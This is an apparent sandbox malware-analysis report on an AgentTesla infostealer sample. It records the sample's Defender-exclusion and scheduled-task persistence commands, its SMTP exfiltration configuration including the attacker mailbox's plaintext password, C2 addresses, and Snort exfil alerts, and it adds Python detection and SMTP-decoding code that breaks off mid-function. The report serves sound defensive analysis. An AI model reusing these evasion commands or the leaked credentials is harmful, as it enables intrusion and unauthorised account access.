
Windows Analysis Report
GestorRemesasCONFIRMIMING.exe

Overview

General Information

Sample name: GestorRemesasCONFIRMIMING.exe
Analysis ID: 1447920
MD5: b7db10ec32fe6f53ee4a76e261761c27
SHA1: 283eb987f7ed2bfb1b4fbe413dd58b5ca8f31afd
SHA256: a0970a01c8310f5643451d71a863709b17e59814b12e81908f37cb649e3d70de
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • GestorRemesasCONFIRMIMING.exe (PID: 3892 cmdline: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe" MD5: B7DB10EC32FE6F53EE4A76E261761C27)
    • powershell.exe (PID: 3132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6712 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2724 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • XNYbGrcoFr.exe (PID: 5096 cmdline: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe MD5: B7DB10EC32FE6F53EE4A76E261761C27)
    • schtasks.exe (PID: 2276 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XNYbGrcoFr.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe" MD5: B7DB10EC32FE6F53EE4A76E261761C27)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Extracted configuration:
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": "   cJPF@$I3   "}
Yara matches (dumped pcap)
Source: dump.pcap | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security

Yara matches (memory dumps)
Source: 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0000000E.00000002.4538569081.0000000003065000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
(19 further entries not shown in this extract)

Yara matches (unpacked PEs)
Source: 14.2.XNYbGrcoFr.exe.400000.0.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
  Strings:
  • 0x34ac7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x34b39:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x34bc3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x34c55:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x34cbf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x34d31:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x34dc7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x34e57:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack | Rule: JoeSecurity_AgentTesla_1 | Description: Yara detected AgentTesla | Author: Joe Security
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.unpack | Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Description: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
  Strings:
  • 0x32cc7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x32d39:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x32dc3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32e55:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x32ebf:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32f31:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x32fc7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33057:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 11.2.XNYbGrcoFr.exe.3b11250.3.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
(24 further entries not shown in this extract)

                    System Summary

Sigma match: Process started | Author: Florian Roth (Nextron Systems)
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe" (CommandLine and ProcessCommandLine identical)
  CommandLine|base64offset|contains: ~2yzw
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (NewProcessName and OriginalFileName identical)
  ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
  ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
  ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe
  ProcessId: 3132, ProcessName: powershell.exe
Sigma match: Process started | Author: Florian Roth (Nextron Systems); data identical to the preceding entry (ProcessId 3132)
Sigma match: Process started | Author: Florian Roth (Nextron Systems)
  Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpE0F1.tmp" (CommandLine and ProcessCommandLine identical)
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe (NewProcessName and OriginalFileName identical)
  ParentCommandLine: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
  ParentImage: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe
  ParentProcessId: 5096, ParentProcessName: XNYbGrcoFr.exe
  ProcessId: 2276, ProcessName: schtasks.exe
Sigma match: Network Connection | Author: frack113
  DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3
  Image: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe, Initiated: true, ProcessId: 2760, Protocol: tcp
  SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49705
Sigma match: Process started | Author: Florian Roth (Nextron Systems)
  Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp" (CommandLine and ProcessCommandLine identical)
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe (NewProcessName and OriginalFileName identical)
  ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
  ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
  ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe
  ProcessId: 2724, ProcessName: schtasks.exe
Sigma match: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe" (CommandLine and ProcessCommandLine identical)
  CommandLine|base64offset|contains: ~2yzw
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (NewProcessName and OriginalFileName identical)
  ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
  ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
  ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe
  ProcessId: 3132, ProcessName: powershell.exe
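The process tree and the Sigma hits above record three host-side behaviours that are worth alerting on independently of any AgentTesla signature: a Defender exclusion added through PowerShell by an executable on the user's Desktop, a scheduled task created from an XML file in %TEMP% that no longer exists by the time anyone looks, and the dropped copy running from the root of %APPDATA%\Roaming. The following detection logic is an added example, not Joe Sandbox code and not part of the report. The event records are constructed from the command lines in the process tree; the field layout (pid, image, command_line, parent_image) is an assumption modelled on Sysmon Event ID 1, and the SysWOW64 image paths follow the Sigma records, which show the 32-bit sample's children running from SysWOW64 even though the command lines name System32. The parent of PID 5096 is not recorded in the tree and is assumed here to be the Task Scheduler service host.

```python
"""Host-side detection over process-creation events (added example, not report code).

Event layout is an assumption modelled on Sysmon Event ID 1 fields; the sample
events are constructed from the command lines recorded in the process tree.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str


# Directories an unprivileged user can write to. Security tooling being
# reconfigured by a parent that lives here is the self-whitelisting pattern.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Desktop|Downloads|Documents)\\", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
# A binary sitting directly in the Roaming root, with no vendor subfolder.
ROAMING_ROOT_EXE = re.compile(r"\\AppData\\Roaming\\[^\\]+\.exe$", re.I)
MP_EXCLUSION = re.compile(r"\b(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)\b", re.I)


def _arg_after(flag: str, cmdline: str) -> str | None:
    """Value following `flag` on the command line, honouring double quotes."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.I)
    return (m.group(1) or m.group(2)) if m else None


def detect(ev: ProcEvent) -> list[str]:
    """Finding names raised by one process-creation event (empty list = nothing)."""
    hits: list[str] = []
    image = ev.image.lower()
    parent_writable = bool(USER_WRITABLE.search(ev.parent_image))

    # 1. Defender exclusion. Severity depends on who asked for it: an admin
    #    console is one thing, an executable on the user's Desktop another.
    if image.endswith("powershell.exe") and MP_EXCLUSION.search(ev.command_line):
        hits.append("defender_exclusion_" + ("high" if parent_writable else "medium"))
        path = _arg_after("-ExclusionPath", ev.command_line)
        if path and USER_WRITABLE.search(path):
            hits.append("defender_exclusion_covers_user_path")

    # 2. schtasks /Create whose task definition is read from %TEMP%. The XML is
    #    deleted afterwards, so the command line is the only record of the task.
    if image.endswith("schtasks.exe") and re.search(r"/create\b", ev.command_line, re.I):
        xml = _arg_after("/XML", ev.command_line)
        if xml and TEMP_DIR.search(xml):
            hits.append("schtasks_xml_from_temp")
        if parent_writable:
            hits.append("schtasks_parent_in_user_path")

    # 3. Execution straight out of the %APPDATA%\Roaming root.
    if ROAMING_ROOT_EXE.search(ev.image):
        hits.append("exe_in_appdata_roaming_root")
    return hits


def run(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map each PID that raised at least one finding to its findings."""
    return {ev.pid: h for ev in events if (h := detect(ev))}


# Constructed from the report's process tree (PIDs and command lines as recorded).
SAMPLE = r"C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
DROPPED = r"C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe"
PS_WOW64 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_SYS32 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(3132, PS_WOW64, f'"{PS_SYS32}" Add-MpPreference -ExclusionPath "{SAMPLE}"', SAMPLE),
    ProcEvent(7068, PS_WOW64, f'"{PS_SYS32}" Add-MpPreference -ExclusionPath "{DROPPED}"', SAMPLE),
    ProcEvent(2724, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp"', SAMPLE),
    # Parent assumed: the tree shows 5096 at top level, i.e. started by the scheduled task.
    ProcEvent(5096, DROPPED, DROPPED, r"C:\Windows\System32\svchost.exe"),
    # Two benign controls (constructed): a service start, and an admin adding an
    # exclusion for a build directory from an interactive session.
    ProcEvent(900, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\svchost.exe -k netsvcs",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(901, PS_SYS32, r'powershell.exe Add-MpPreference -ExclusionPath "C:\BuildAgent\work"',
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, findings in run(EVENTS).items():
        print(pid, findings)
```

Matching on the image path rather than the command line matters here: a 32-bit parent launches the SysWOW64 copies of powershell.exe and schtasks.exe, so a rule that keys on the literal System32 path in the Image field would miss both children.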

                    Persistence and Installation Behavior

Sigma match: Process started | Author: Joe Security
  Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XNYbGrcoFr" /XML "C:\Users\user\AppData\Local\Temp\tmpCF9B.tmp" (CommandLine and ProcessCommandLine identical)
  CommandLine|base64offset|contains: *j
  Image: C:\Windows\SysWOW64\schtasks.exe (NewProcessName and OriginalFileName identical)
  ParentCommandLine: "C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe"
  ParentImage: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe
  ParentProcessId: 3892, ParentProcessName: GestorRemesasCONFIRMIMING.exe
  ProcessId: 2724, ProcessName: schtasks.exe

Snort alerts:
  Timestamp: 05/27/24-12:30:54.369627 | SID: 2030171 | Source Port: 49709 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected
  Timestamp: 05/27/24-12:30:51.051527 | SID: 2030171 | Source Port: 49705 | Destination Port: 587 | Protocol: TCP | Classtype: A Network Trojan was detected


                    AV Detection

Source: GestorRemesasCONFIRMIMING.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Avira: detection malicious, Label: TR/AD.GenSteal.wukbo
Source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.santonswitchgears.com", "Username": "tech1@santonswitchgears.com", "Password": " cJPF@$I3 "}
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | ReversingLabs: Detection: 63%
Source: GestorRemesasCONFIRMIMING.exe | ReversingLabs: Detection: 63%
Source: GestorRemesasCONFIRMIMING.exe | Virustotal: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Joe Sandbox ML: detected
Source: GestorRemesasCONFIRMIMING.exe | Joe Sandbox ML: detected
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: GestorRemesasCONFIRMIMING.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: yuZb.pdbSHA256 | source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr
Source: Binary string: yuZb.pdb | source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr
Source: C:\Users\user\Desktop\GestorRemesasCONFIRMIMING.exe | Code function: 4x nop then jmp 06A4AD75h (0_2_06A4AEAA)
Source: C:\Users\user\AppData\Roaming\XNYbGrcoFr.exe | Code function: 4x nop then jmp 06A19F6Dh (11_2_06A1A0A2)

                    Networking

Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49705 -> 208.91.198.143:587
Source: Traffic | Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49709 -> 208.91.198.143:587
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b4d470.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.XNYbGrcoFr.exe.3b11250.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38fc328.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.GestorRemesasCONFIRMIMING.exe.38c0108.5.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.6:49705 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected (2 entries): GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.91.198.143
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | IP Address: 172.67.74.152 (2 entries)
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | ASN Name: TUT-ASUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: api.ipify.org (3 entries)
Source: unknown | DNS query: name: ip-api.com
Source: global traffic | TCP traffic: 192.168.2.6:49705 -> 208.91.198.143:587
Source: global traffic | HTTP traffic detected (2 entries): GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 entries)
Source: global traffic | HTTP traffic detected (2 entries): GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (2 entries): GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: global traffic | DNS traffic detected: DNS query: smtp.santonswitchgears.com
Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003051000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2123183348.000000000260A000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2166350943.000000000285A000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://smtp.santonswitchgears.com
Source: GestorRemesasCONFIRMIMING.exe, XNYbGrcoFr.exe.0.dr | String found in binary or memory: http://tempuri.org/DataSet1.xsdIDataAccessLayer.Properties.Resources
Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.000000000308D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4534288426.0000000000437000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000000.00000002.2124143987.00000000041E8000.00000004.00000800.00020000.00000000.sdmp, GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000B.00000002.2167592562.0000000003B11000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4534286428.0000000000436000.00000040.00000400.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/
Source: GestorRemesasCONFIRMIMING.exe, 00000009.00000002.4538007808.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, XNYbGrcoFr.exe, 0000000E.00000002.4538569081.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org/t
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49707 version: TLS 1.2
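Both Snort hits (SID 2030171) and the configuration extractor point at the same thing: credentials and system details leave the host over SMTP submission on port 587 to the mailbox named in the config. Because the session uses AUTH LOGIN without STARTTLS, the account name and password travel as bare base64 in the TCP stream and can be read straight out of dump.pcap, which is the quickest way to confirm the extracted configuration against observed traffic. The parser below is an added example, not Joe Sandbox code and not part of the report. Its transcript is constructed: the host, port and username come from the extracted configuration, the server banner uses the mailhostbox name found in the sample's memory strings, and the password, recipient, Subject and body are placeholders.

```python
"""Decode an SMTP submission session (AUTH LOGIN / AUTH PLAIN) and tie it back
to the extracted configuration (added example, not report code).

The transcript returned by build_transcript() is constructed for this example.
"""
from __future__ import annotations

import base64
from dataclasses import dataclass, field

# From the report's configuration extractor (password deliberately omitted).
EXTRACTED_CONFIG = {"Exfil Mode": "SMTP", "Port": "587",
                    "Host": "smtp.santonswitchgears.com",
                    "Username": "tech1@santonswitchgears.com"}


@dataclass
class SmtpSession:
    banner: str | None = None
    starttls: bool = False
    username: str | None = None
    password: str | None = None
    mail_from: str | None = None
    rcpt_to: list[str] = field(default_factory=list)
    headers: dict[str, str] = field(default_factory=dict)
    body: list[str] = field(default_factory=list)


def _b64(token: str) -> str:
    return base64.b64decode(token).decode("utf-8", errors="replace")


def parse_session(stream: list[tuple[str, str]]) -> SmtpSession:
    """stream: (direction, line) pairs in wire order; 'C' = client, 'S' = server."""
    sess = SmtpSession()
    auth_step = 0            # 1: next client line is the username, 2: the password
    in_data = in_headers = False
    for who, line in stream:
        if who == "S":
            if line.startswith("220") and sess.banner is None:
                sess.banner = line[4:]
            elif line.startswith("354"):     # server accepts the DATA phase
                in_data = in_headers = True
            continue
        if in_data:                          # message content, not commands
            if line == ".":
                in_data = False
            elif in_headers:
                if line == "":
                    in_headers = False
                elif ":" in line:
                    name, value = line.split(":", 1)
                    sess.headers[name.strip()] = value.strip()
            else:
                sess.body.append(line)
            continue
        verb = line.upper()
        if auth_step == 1:
            sess.username, auth_step = _b64(line), 2
        elif auth_step == 2:
            sess.password, auth_step = _b64(line), 0
        elif verb == "STARTTLS":
            sess.starttls = True
            break                            # everything after this is TLS
        elif verb.startswith("AUTH LOGIN"):
            parts = line.split()
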